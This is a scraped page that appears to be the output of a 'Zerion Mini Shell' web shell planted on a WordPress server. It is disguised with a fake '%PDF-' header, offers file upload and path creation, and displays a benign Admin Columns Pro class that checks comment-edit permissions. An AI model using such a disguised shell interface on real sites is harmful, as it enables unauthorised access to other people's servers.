%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/knwn/wp-content/plugins/admin-columns-pro/classes/Editing/Strategy/
Upload File :
Create Path :
Current File : /var/www/knwn/wp-content/plugins/admin-columns-pro/classes/Editing/Strategy/Comment.php

<?php

namespace ACP\Editing\Strategy;

use ACP\Editing\Strategy;
use WP_Comment;

class Comment implements Strategy {

	/**
	 * @param $comment
	 *
	 * @return bool
	 * @since 4.0
	 */
	public function user_has_write_permission( $comment ) {
		if ( ! $comment instanceof WP_Comment ) {
			$comment = get_comment( $comment );

			if ( ! $comment instanceof WP_Comment ) {
				return false;
			}
		}

		if ( ! current_user_can( 'edit_comment', $comment->comment_ID ) ) {
			return false;
		}

		return true;
	}

}

Zerion Mini Shell 1.0